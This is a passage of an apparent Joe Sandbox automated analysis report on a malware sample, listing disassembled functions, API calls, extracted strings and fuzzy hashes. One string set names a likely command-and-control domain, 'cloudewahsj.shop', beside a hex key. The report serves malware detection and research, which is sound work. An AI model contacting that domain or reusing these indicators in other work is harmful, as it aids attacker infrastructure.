                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                              • String ID: mj
                                                                              • API String ID: 764372645-1022201683
                                                                              • Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                                              • Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
                                                                              • Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                                              • Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 67
                                                                              • API String ID: 237503144-1886922373
                                                                              • Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                                              • Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
                                                                              • Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                                              • Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 23
                                                                              • API String ID: 237503144-326707096
                                                                              • Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                                              • Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
                                                                              • Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                                              • Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 67
                                                                              • API String ID: 237503144-1886922373
                                                                              • Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                                              • Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
                                                                              • Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                                              • Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 67
                                                                              • API String ID: 237503144-1886922373
                                                                              • Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                                              • Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
                                                                              • Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                                              • Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-3916222277
                                                                              • Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                                              • Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
                                                                              • Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                                              • Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #C}$@-$up$vC
                                                                              • API String ID: 0-3794437364
                                                                              • Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                                              • Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
                                                                              • Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                                              • Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 67$J$u$wq
                                                                              • API String ID: 0-4028943437
                                                                              • Opcode ID: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
                                                                              • Instruction ID: 45cabc22797d8237a69fda20461bdfe49cb428b8aed426b658ce7b40843b0e88
                                                                              • Opcode Fuzzy Hash: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
                                                                              • Instruction Fuzzy Hash: 2AB176B04483828BD7348F25C4A17EBBBE1EF92314F14892DD8D94B785E7794886CB87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                                              • Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
                                                                              • Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                                              • Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                                              • Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
                                                                              • Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                                              • Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                                              • Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
                                                                              • Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                                              • Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                                                              • Instruction ID: 86640fba6bac160b05b0c43110ab63d66e8f7ec2f5acf9dcdae8f0d28c6b6e57
                                                                              • Opcode Fuzzy Hash: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                                                              • Instruction Fuzzy Hash: 8002ED3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: S"(w$S"(w$f
                                                                              • API String ID: 2994545307-891790955
                                                                              • Opcode ID: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
                                                                              • Instruction ID: 3cfac3c3f928c660201977811b78d3d3052ee887d4b0c26ff85acd92e20ac89e
                                                                              • Opcode Fuzzy Hash: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
                                                                              • Instruction Fuzzy Hash: B412E1756083508FE324CF19C880B2BBBE1BBC9314F148A6EE9D45B3A1D775AC45CB96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: S"(w$S"(w$f
                                                                              • API String ID: 0-891790955
                                                                              • Opcode ID: 921702299f1cd4c13fffa9b783ac6d262d1d77973908fbb24f5e35fc36ff4b1f
                                                                              • Instruction ID: 4fb4f3989973b5a411e2ab5224d4fa50da7482a36b3864bdd3ecb44fc834f448
                                                                              • Opcode Fuzzy Hash: 921702299f1cd4c13fffa9b783ac6d262d1d77973908fbb24f5e35fc36ff4b1f
                                                                              • Instruction Fuzzy Hash: E212E3716483A09FD724CF15D880B6ABBE2FFC5318F14862CF4995B392D7719819CB92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
                                                                              • Instruction ID: 631fa3f1d4c0726364ceec28ad2e892877ef6bcbce7aa5fcc49a4e7daf9cf800
                                                                              • Opcode Fuzzy Hash: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
                                                                              • Instruction Fuzzy Hash: DAE1FE39B09321CFD304DF29D89072AB7E2FB9A311F4A887DD589873A2D634D941CB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 37E0CC8E008D304A822D1F4978021086$cloudewahsj.shop$yD
                                                                              • API String ID: 0-2844569758
                                                                              • Opcode ID: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                                              • Instruction ID: ea6ce95d3b2e4101921536522c50bf2979d69fc2778ed717b5a7399473229c95
                                                                              • Opcode Fuzzy Hash: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                                              • Instruction Fuzzy Hash: BF322951608BD28DD326CB7C8848355BF912B27228F1C87DDD1E94F3D3D2AA8587C7A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 37E0CC8E008D304A822D1F4978021086$cloudewahsj.shop$yD
                                                                              • API String ID: 0-2844569758
                                                                              • Opcode ID: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                                              • Instruction ID: 871b344d276ad9ec18211cdd288877dece8cd7d30e4d034214d0831ce8887517
                                                                              • Opcode Fuzzy Hash: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                                                              • Instruction Fuzzy Hash: 8C3229615087C28DD726CA3C8888355BF912B67228F1C87DDD1E94F3D3D3AA8587C7A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -jkhanold~m`$anold~m`$d~m`
                                                                              • API String ID: 0-185452761
                                                                              • Opcode ID: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
                                                                              • Instruction ID: fa2a646c56ecb98ff3369e84eb354fbc62152b2c9113dfe59572bbf826f6bdf4
                                                                              • Opcode Fuzzy Hash: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
                                                                              • Instruction Fuzzy Hash: E5D18CB06483808FD714DF68C895BABBBE4FF85718F14491CE9958B391E7B8D809CB52
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M;D$>D$UUK
                                                                              • API String ID: 0-3649699930
                                                                              • Opcode ID: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
                                                                              • Instruction ID: ab5f315b9e91ee1687aa44fd25e1738b775e8891b6341d15c5394949b1c7dc9f
                                                                              • Opcode Fuzzy Hash: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
                                                                              • Instruction Fuzzy Hash: 53D1FF3AA08310CFD314DF29D89072AB7E2FBDA310F4A897DE58987392D674D941CB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8deZ$<`>f$567
                                                                              • API String ID: 0-937435233
                                                                              • Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                                              • Instruction ID: 754c1abd1b676f1653a7a5478e22f099d0a2726f3b1f9a9f143ecbe85e8fc021
                                                                              • Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                                              • Instruction Fuzzy Hash: 99D1FFB06083208BD720DF24C851B6BB7F2FFE1354F498A6DE4858B3A5E3799845C756
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8deZ$<`>f$567
                                                                              • API String ID: 0-937435233
                                                                              • Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                                              • Instruction ID: 266df254f3474c96dac5a4f3ce01632a0fcf85f4a6e9e96e7edac86c7bd1312f
                                                                              • Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                                                              • Instruction Fuzzy Hash: A8D1EFB15583008BD724DF24C891B6BB7F2EFC2318F09892CE4898B3D5E7B99445CB56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 5$Tx+$bC
                                                                              • API String ID: 0-2958649183
                                                                              • Opcode ID: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                                                              • Instruction ID: 57781aab13a08c1a066b8e14d20b5adcd793598ba32206fb76d556f76c65c1e4
                                                                              • Opcode Fuzzy Hash: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                                                              • Instruction Fuzzy Hash: 66B1C17050C3918AE7358F2990643ABFFE0AF93304F98496ED5C987392D7794409CB56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: &76#$/X$BDE:
                                                                              • API String ID: 2994545307-3468712750
                                                                              • Opcode ID: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
                                                                              • Instruction ID: de511f14106650819994a34559177bbffe3ae858db635c904efe7b47fdd347f8
                                                                              • Opcode Fuzzy Hash: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
                                                                              • Instruction Fuzzy Hash: 4C9146B27093119BD3109F25EC8176FB6D2EBC5318F58813EE4858B381EA3C9846878B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: &76#$/X$BDE:
                                                                              • API String ID: 0-3468712750
                                                                              • Opcode ID: 3e21cf73c2ae3528f4817cde07a7e232aa130a7225a0a67fc89e53a2e6491216
                                                                              • Instruction ID: d464608606054b59f4836a3b341abe6e3b8d719381091f0d1afd418675d20b57
                                                                              • Opcode Fuzzy Hash: 3e21cf73c2ae3528f4817cde07a7e232aa130a7225a0a67fc89e53a2e6491216
                                                                              • Instruction Fuzzy Hash: 139135B26493008BD7249F25CCD17ABB6E2EFC5318F1A853CE4858B2D0E7B99806C756
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 5$Tx+$bC
                                                                              • API String ID: 0-2958649183
                                                                              • Opcode ID: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                                                              • Instruction ID: c6dbd191573f8eaa778921652fb4887c0da57f4868ba9d7cab245032b22be67a
                                                                              • Opcode Fuzzy Hash: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                                                              • Instruction Fuzzy Hash: D0A1C17050C3918AE739CF2994603EBBFE0AF96304F58897ED5C987392D7794409CB56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ut$.^Nw$QRP,
                                                                              • API String ID: 0-2489489831
                                                                              • Opcode ID: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
                                                                              • Instruction ID: c8479f28a28c815cfbd9d5fc95f9476b123213feaa6e9ea5c0c948cebaf48d73
                                                                              • Opcode Fuzzy Hash: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
                                                                              • Instruction Fuzzy Hash: 3B710A7110D3918FD3258B2588B03E7BBD19FDB704F585A5DD0CA4B341DB794906CB56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $:$K
                                                                              • API String ID: 0-296352136
                                                                              • Opcode ID: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                                              • Instruction ID: e3fd2fc2a8267f717fe0e7e766dd9ea259cde5192962e3fe240e8cbdfa04c585
                                                                              • Opcode Fuzzy Hash: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                                              • Instruction Fuzzy Hash: 3A51A27250C7908AD7209B3884543AFBBD0AB96334F190F7EE8EAE73C1E67885458757
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $:$K
                                                                              • API String ID: 0-296352136
                                                                              • Opcode ID: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                                              • Instruction ID: d67ad62ce36ab1dc8dda3bd351edecac75dacb55de9d7e73957b50944a5c7e5c
                                                                              • Opcode Fuzzy Hash: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                                                              • Instruction Fuzzy Hash: 1751F57250C7908FDB258B3888583AFBBD0AB95324F090F6DD9EAD73C1E6748641D752
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @-$up$vC
                                                                              • API String ID: 0-1828384444
                                                                              • Opcode ID: 422b25fc84451906c3cd7cd792491071fe5ff7971ca24ee0d353181616b7cc8a
                                                                              • Instruction ID: 87c970690bb8e648ca60e297e6bc1b88414b699a6ce19e7478b355fb598f3ec0
                                                                              • Opcode Fuzzy Hash: 422b25fc84451906c3cd7cd792491071fe5ff7971ca24ee0d353181616b7cc8a
                                                                              • Instruction Fuzzy Hash: 1E412EB02497819FE3248FA1D894B9BBBE2BBC6344F148A2DE1D84B351C7788449CF57
                                                                              Strings
                                                                              Memory Dump Source
